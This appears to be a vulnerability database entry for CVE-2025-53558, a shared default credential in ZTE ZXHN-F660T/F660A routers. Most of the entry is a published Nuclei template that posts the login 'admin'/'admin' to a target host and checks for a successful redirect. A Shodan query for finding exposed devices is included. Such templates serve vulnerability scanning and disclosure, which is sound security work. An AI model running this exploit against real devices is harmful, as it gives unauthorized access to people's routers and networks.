漏洞描述
ZXHN-F660T and ZXHN-F660A provided by ZTE Japan K.K. use a common credential for all installations. With the knowledge of the credential, an attacker may log in to the affected devices.
CVE-2025-53558: ZTE ZXHN-F660T/F660A - Default Credentials
PoC代码[已公开]
id: CVE-2025-53558
info:
name: ZTE ZXHN-F660T/F660A - Default Credentials
author: DhiyaneshDK
severity: high
description: |
ZXHN-F660T and ZXHN-F660A provided by ZTE Japan K.K. use a common credential for all installations. With the knowledge of the credential, an attacker may log in to the affected devices.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-53558
- https://jvn.jp/en/jp/JVN66546573/
metadata:
shodan-query: title:"F660"
verified: true
max-request: 1
tags: cve,cve2025,default-login,zte,vuln
variables:
username: "admin"
password: "admin"
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Referer: {{RootURL}}
frashnum=&action=login&Frm_Logintoken=0&Username={{username}}&Password={{password}}
matchers-condition: and
matchers:
- type: word
part: location
words:
- "/start.ghtml"
- type: status
status:
- 302
- type: word
part: body
words:
- "wrong username"
- "User information is error"
negative: true
# digest: 4a0a00473045022100f59720f16e3180046a76d1d20f7e801aaee8cf84d50cfd1512ad3076227e1bed02206c6a56577128cab6f117c72012c1a6fa11880a6da886a3ac2eac5022a74410ff:922c64590222798bb761d5b6d8e72950